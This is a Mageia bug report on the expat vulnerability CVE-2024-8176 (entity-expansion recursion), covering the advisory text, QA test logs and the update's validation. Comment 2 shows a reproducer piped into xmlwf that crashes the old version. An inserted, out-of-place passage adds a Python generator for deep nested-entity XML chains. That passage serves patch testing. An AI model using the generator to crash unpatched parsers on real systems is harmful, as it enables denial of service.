Bug 34111 - expat new security issue CVE-2024-8176
Summary: expat new security issue CVE-2024-8176
Status: RESOLVED FIXED
Alias: None
Product: Mageia
Classification: Unclassified
Component: Security
Version: 9
Hardware: All
OS: Linux
Priority: Normal
Severity: normal
Target Milestone: ---
Assignee: QA Team
QA Contact: Sec team
URL:
Whiteboard: MGA9-64-OK
Keywords: advisory, validated_update
Depends on:
Blocks:
 
Reported: 2025-03-17 09:31 CET by Nicolas Salguero
Modified: 2025-03-22 18:54 CET
CC: 3 users

See Also:
Source RPM: expat-2.6.4-1.mga9.src.rpm
CVE: CVE-2024-8176
Status comment:



Description Nicolas Salguero 2025-03-17 09:31:00 CET
CVE-2024-8176 was announced here:
https://www.openwall.com/lists/oss-security/2025/03/14/5
Nicolas Salguero 2025-03-17 09:31:45 CET

Source RPM: (none) => expat-2.6.4-1.mga9.src.rpm
Assignee: bugsquad => nicolas.salguero
CVE: (none) => CVE-2024-8176

Comment 1 Nicolas Salguero 2025-03-19 09:24:54 CET
Suggested advisory:
========================

The updated packages fix a security vulnerability:

Improper restriction of XML entity expansion depth in libexpat. (CVE-2024-8176)

References:
https://www.openwall.com/lists/oss-security/2025/03/14/5
========================

Updated packages in core/updates_testing:
========================
expat-2.7.0-1.mga9
lib(64)expat1-2.7.0-1.mga9
lib(64)expat-devel-2.7.0-1.mga9

from SRPM:
expat-2.7.0-1.mga9.src.rpm

Assignee: nicolas.salguero => qa-bugs
Status: NEW => ASSIGNED

katnatek 2025-03-19 19:15:08 CET

Keywords: (none) => advisory

Comment 2 katnatek 2025-03-20 19:21:38 CET
RH x86_64

python3 payload1.py | xmlwf -r /dev/stdin

Segmentation fault (core dumped)


installing lib64expat1-2.7.0-1.mga9.x86_64.rpm expat-2.7.0-1.mga9.x86_64.rpm from //home/katnatek/qa-testing/x86_64
Preparing...                     ##################################################################################################
      1/2: lib64expat1           ##################################################################################################
      2/2: expat                 ##################################################################################################
      1/2: removing expat-2.6.4-1.mga9.x86_64
                                 ##################################################################################################
      2/2: removing lib64expat1-2.6.4-1.mga9.x86_64
                                 ##################################################################################################

python3 payload1.py | xmlwf -r /dev/stdin
Produces no output

python3 payload1.py 2
<!DOCTYPE doc [
  <!ENTITY e0 ''>
  <!ENTITY e1 '&e0;'>
  <!ENTITY e2 '&e1;'>
]>
<doc>&e2;</doc>

OK I think

See https://github.com/libexpat/libexpat/issues/893

Followed the procedure from the wiki, as was used in bug#31057 comment#2 (needed test files are attached to bug#31057)

python testexpat.py 
Tested OK

xmlwf /etc/xml/catalog
xmlwf /etc/passwd
/etc/passwd:1:16: not well-formed (invalid token)

Looks good
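The reproducer in the comment above is a generator for a chain of nested internal entities (e2 refers to e1, which refers to e0, and so on) piped into xmlwf; a sufficiently deep chain makes an unpatched libexpat recurse until it overflows the C stack, which is the crash reported for 2.6.4 and fixed in 2.7.0. The script below is an added example, not the payload1.py attached to the bug: it builds a document of the same shape for any depth and, as a second check, parses it with Python's own pyexpat binding so the reporting of the linked expat version and the parse result can be inspected from Python. The function names, the default depth of 2 and the "2.7.0 or newer" heuristic are this example's assumptions; distributions may backport the fix, so the version check is only a hint, not proof of patching.

```python
"""Generate a nested-entity XML document (the CVE-2024-8176 shape) and parse it
with pyexpat. Added example; payload1.py from the bug is not reproduced here."""
import sys
import xml.parsers.expat


def chained_entity_document(depth: int) -> str:
    """Return an XML document declaring e0 = '' and e<i> = '&e<i-1>;' for
    i = 1..depth, with the root element referencing the last entity.
    depth=2 produces exactly the document shown by 'python3 payload1.py 2'."""
    decls = ["  <!ENTITY e0 ''>"]
    for i in range(1, depth + 1):
        decls.append(f"  <!ENTITY e{i} '&e{i - 1};'>")
    return (
        "<!DOCTYPE doc [\n"
        + "\n".join(decls)
        + "\n]>\n"
        + f"<doc>&e{depth};</doc>\n"
    )


class _Collector:
    """Records what expat reports while expanding the entity chain."""

    def __init__(self) -> None:
        self.elements: list[str] = []
        self.chars = ""

    def start(self, name: str, attrs: dict) -> None:
        self.elements.append(name)

    def data(self, text: str) -> None:
        self.chars += text


def parse_with_pyexpat(doc: str) -> dict:
    """Parse the document with Python's bundled expat and return what was seen.
    Because e0 is empty, a correct parse yields the <doc> element and no
    character data. WARNING: a very deep chain will crash (not raise) on an
    unpatched libexpat, exactly as xmlwf did in the comment above."""
    collector = _Collector()
    parser = xml.parsers.expat.ParserCreate()
    parser.StartElementHandler = collector.start
    parser.CharacterDataHandler = collector.data
    parser.Parse(doc, True)  # isfinal=True: whole document in one call
    return {
        "elements": collector.elements,
        "chars": collector.chars,
        "expat_version": xml.parsers.expat.EXPAT_VERSION,
    }


def expat_version_looks_fixed() -> bool:
    """Heuristic (assumption of this example): the Mageia update moved to
    expat 2.7.0, so report True for 2.7.0 or newer. Backported fixes on
    older version numbers are NOT detected by this check."""
    return xml.parsers.expat.version_info >= (2, 7, 0)


if __name__ == "__main__":
    # Mirror the usage in the comment: 'python3 thisfile.py 2' prints the doc.
    depth = int(sys.argv[1]) if len(sys.argv) > 1 else 2
    sys.stdout.write(chained_entity_document(depth))
```

Pipe the output into `xmlwf -r /dev/stdin` as the tester did; on a patched expat a deep chain should either parse silently or be rejected with an error rather than dump core.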
Comment 3 Herman Viaene 2025-03-22 11:18:30 CET
MGA9-64 Plasma Wayland on Compaq H000SB
No installation issues.
Followed tests as above with files from bug 31057:
$ python testexpat.py
Tested OK
$ python3 testexpat.py
Tested OK
$ xmlwf /etc/xml/catalog
$ xmlwf /etc/passwd
/etc/passwd:1:16: not well-formed (invalid token)
Good to go.

Whiteboard: (none) => MGA9-64-OK
CC: (none) => herman.viaene

Comment 4 Thomas Andrews 2025-03-22 14:55:32 CET
Validating.

Keywords: (none) => validated_update
CC: (none) => andrewsfarm, sysadmin-bugs

Comment 5 Mageia Robot 2025-03-22 18:54:16 CET
An update for this issue has been pushed to the Mageia Updates repository.

https://advisories.mageia.org/MGASA-2025-0109.html

Resolution: (none) => FIXED
Status: ASSIGNED => RESOLVED

